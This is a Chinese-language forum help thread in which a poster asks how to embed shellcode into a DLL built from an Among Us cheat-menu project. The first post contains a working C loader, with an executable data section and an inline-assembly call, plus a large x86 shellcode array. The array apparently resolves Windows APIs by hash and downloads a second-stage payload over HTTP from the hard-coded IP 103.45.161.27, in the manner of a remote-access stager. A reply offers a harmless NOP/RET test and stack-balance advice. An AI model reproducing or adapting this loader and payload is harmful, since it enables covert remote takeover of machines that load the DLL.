丿DF、无影彡 发表于 2021-5-5 00:26

【求助】shellcode怎么写到一个dll链接库文件

我想将一段shellcode写进一个用C编写的项目:这段shellcode可以单独编译并运行,可我一旦把它写进那个dll项目,就运行不起来了

这是那个dll的项目:https://github.com/BitCrackers/AmongUsMenu.git

这是我的shellcode:
------------------------------------------------------------------------
#include <stdio.h>
#include <windows.h>
#pragma comment(linker,"/subsystem:\"windows\" /entry:\"mainCRTStartup\"")// 隐藏控制台窗口显示
#pragma comment(linker,"/INCREMENTAL:NO")                                     // 减小编译体积
#pragma comment(linker, "/section:.data,RWE")


//#include<stdio.h>
//#include<windows.h>
//#pragma comment( linker, "/subsystem:\"windows\" /entry:\"mainCRTStartup\"")


/*
 * Raw x86 machine code kept in a writable byte array and executed by main()
 * through an indirect CALL.  The array lives in .data, so the
 * "/section:.data,RWE" linker pragma above is what makes the call legal
 * under DEP/NX; a writable+executable .data section is itself an anomaly
 * that loaders and scanners key on.
 *
 * Plain-text fragments that are visible once the \x escapes are decoded
 * (useful for triage; nothing here is inferred beyond the byte values):
 *   - "wini" and "net\0" pushed as two dwords   -> "wininet"
 *   - "Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\0"
 *   - a "/"-prefixed, NUL-terminated path beginning "/pici..."
 *   - "103.45.161.27\0" -- an IPv4 literal; record it as an indicator
 * The repeated pattern "\x68 <4 bytes> \xff\xd5" (push imm32; call ebp)
 * looks like run-time API resolution by hash -- inferred, not verified here.
 * The leading "\xfc\xe8\x8f\x00\x00\x00" is cld followed by a forward CALL,
 * i.e. the blob is laid out to be position independent (inferred).
 * The inline `lea eax` / `call eax` in main() implies a 32-bit build.
 */
unsigned char shellcode[] =
"\xfc\xe8\x8f\x00\x00\x00\x60\x31\xd2\x64\x8b\x52\x30\x8b\x52"
"\x0c\x8b\x52\x14\x89\xe5\x8b\x72\x28\x31\xff\x0f\xb7\x4a\x26"
"\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\x49"
"\x75\xef\x52\x8b\x52\x10\x57\x8b\x42\x3c\x01\xd0\x8b\x40\x78"
"\x85\xc0\x74\x4c\x01\xd0\x8b\x58\x20\x50\x01\xd3\x8b\x48\x18"
"\x85\xc9\x74\x3c\x31\xff\x49\x8b\x34\x8b\x01\xd6\x31\xc0\xc1"
"\xcf\x0d\xac\x01\xc7\x38\xe0\x75\xf4\x03\x7d\xf8\x3b\x7d\x24"
"\x75\xe0\x58\x8b\x58\x24\x01\xd3\x66\x8b\x0c\x4b\x8b\x58\x1c"
"\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44\x24\x24\x5b\x5b\x61\x59"
"\x5a\x51\xff\xe0\x58\x5f\x5a\x8b\x12\xe9\x80\xff\xff\xff\x5d"
"\x68\x6e\x65\x74\x00\x68\x77\x69\x6e\x69\x54\x68\x4c\x77\x26"
"\x07\xff\xd5\x31\xdb\x53\x53\x53\x53\x53\xe8\x3e\x00\x00\x00"
"\x4d\x6f\x7a\x69\x6c\x6c\x61\x2f\x35\x2e\x30\x20\x28\x57\x69"
"\x6e\x64\x6f\x77\x73\x20\x4e\x54\x20\x36\x2e\x31\x3b\x20\x54"
"\x72\x69\x64\x65\x6e\x74\x2f\x37\x2e\x30\x3b\x20\x72\x76\x3a"
"\x31\x31\x2e\x30\x29\x20\x6c\x69\x6b\x65\x20\x47\x65\x63\x6b"
"\x6f\x00\x68\x3a\x56\x79\xa7\xff\xd5\x53\x53\x6a\x03\x53\x53"
"\x68\xc9\x0f\x00\x00\xe8\x77\x01\x00\x00\x2f\x70\x69\x63\x69"
"\x71\x5f\x52\x35\x48\x66\x78\x56\x2d\x31\x54\x36\x4e\x57\x70"
"\x46\x62\x77\x67\x49\x78\x54\x6a\x48\x53\x54\x57\x6e\x31\x62"
"\x6e\x42\x68\x76\x63\x36\x6e\x5a\x6f\x59\x4d\x69\x44\x61\x5f"
"\x67\x49\x4b\x68\x65\x45\x4b\x77\x6a\x38\x68\x62\x6c\x41\x6d"
"\x5f\x63\x71\x4f\x35\x6d\x30\x57\x44\x4a\x5a\x4f\x75\x46\x42"
"\x74\x69\x44\x39\x73\x48\x61\x59\x31\x35\x4e\x34\x51\x4f\x75"
"\x35\x4b\x6e\x6b\x4c\x35\x54\x56\x50\x63\x53\x6e\x37\x4b\x6a"
"\x64\x70\x79\x73\x67\x2d\x2d\x4a\x6a\x59\x41\x78\x58\x6a\x69"
"\x4c\x69\x4c\x5a\x54\x6d\x6b\x50\x4b\x6f\x6d\x79\x7a\x74\x63"
"\x6f\x76\x45\x63\x54\x78\x5a\x55\x6d\x6a\x68\x7a\x4e\x55\x6b"
"\x33\x6c\x47\x43\x6e\x4c\x34\x2d\x47\x7a\x6f\x64\x45\x66\x6b"
"\x30\x46\x2d\x30\x77\x54\x6e\x56\x56\x36\x47\x42\x62\x53\x54"
"\x56\x54\x7a\x31\x32\x41\x59\x52\x48\x46\x76\x54\x6d\x33\x68"
"\x75\x74\x72\x62\x6d\x6d\x65\x33\x77\x69\x6c\x39\x35\x57\x38"
"\x49\x67\x52\x37\x2d\x62\x50\x4a\x45\x75\x54\x79\x77\x63\x46"
"\x5a\x41\x67\x36\x73\x31\x78\x41\x53\x50\x59\x57\x61\x72\x57"
"\x5f\x71\x64\x54\x78\x69\x00\x50\x68\x57\x89\x9f\xc6\xff\xd5"
"\x89\xc6\x53\x68\x00\x02\x68\x84\x53\x53\x53\x57\x53\x56\x68"
"\xeb\x55\x2e\x3b\xff\xd5\x96\x6a\x0a\x5f\x53\x53\x53\x53\x56"
"\x68\x2d\x06\x18\x7b\xff\xd5\x85\xc0\x75\x14\x68\x88\x13\x00"
"\x00\x68\x44\xf0\x35\xe0\xff\xd5\x4f\x75\xe1\xe8\x4a\x00\x00"
"\x00\x6a\x40\x68\x00\x10\x00\x00\x68\x00\x00\x40\x00\x53\x68"
"\x58\xa4\x53\xe5\xff\xd5\x93\x53\x53\x89\xe7\x57\x68\x00\x20"
"\x00\x00\x53\x56\x68\x12\x96\x89\xe2\xff\xd5\x85\xc0\x74\xcf"
"\x8b\x07\x01\xc3\x85\xc0\x75\xe5\x58\xc3\x5f\xe8\x7f\xff\xff"
"\xff\x31\x30\x33\x2e\x34\x35\x2e\x31\x36\x31\x2e\x32\x37\x00"
"\xbb\xf0\xb5\xa2\x56\x6a\x00\x53\xff\xd5";

/*
 * Entry point: hands control to the first byte of `shellcode` with an
 * indirect CALL (MSVC 32-bit inline assembly).  Execution comes back to
 * `return 0` only if the code in the buffer ends in a RET with the stack
 * balanced; the "/section:.data,RWE" pragma above is what lets a .data
 * address be called at all.  argc/argv are unused.
 */
int main(int argc, char **argv)
{
        __asm
        {
                lea eax, shellcode      ; eax = address of the byte array
                call eax                ; returns here only on a balanced RET
        }
        return 0;
}
------------------------------------------------------------------------

6767 发表于 2021-5-5 02:10

#include <stdio.h>
#include <windows.h>
#pragma comment(linker,"/subsystem:\"windows\" /entry:\"mainCRTStartup\"")// 隐藏控制台窗口显示
#pragma comment(linker,"/INCREMENTAL:NO")                                     // 减小编译体积
#pragma comment(linker, "/section:.data,RWE")

/*
 * Minimal probe payload: three NOPs (0x90) followed by RET (0xC3), so the
 * indirect call in main() returns immediately with the stack untouched.
 * It isolates the RWE-section + CALL mechanism from the contents of a
 * larger byte string.
 */
unsigned char shellcode[] =
"\x90\x90\x90\xC3";
/*
 * nop x3; return
 */

/*
 * Entry point: indirect CALL into the `shellcode` byte array (MSVC 32-bit
 * inline assembly).  With the 4-byte probe payload the RET brings control
 * straight back to `return 0`; the "/section:.data,RWE" pragma above is
 * what makes the .data address executable.  argc/argv are unused.
 */
int main(int argc, char **argv)
{
      __asm
      {
                lea eax, shellcode      ; eax = address of the byte array
                call eax                ; returns after the payload's RET
      }
      return 0;
}

cpp最简的代码没有问题,估计是你的shellcode出问题了。
上面一堆shellcode hex不好调试,先检查一下栈平衡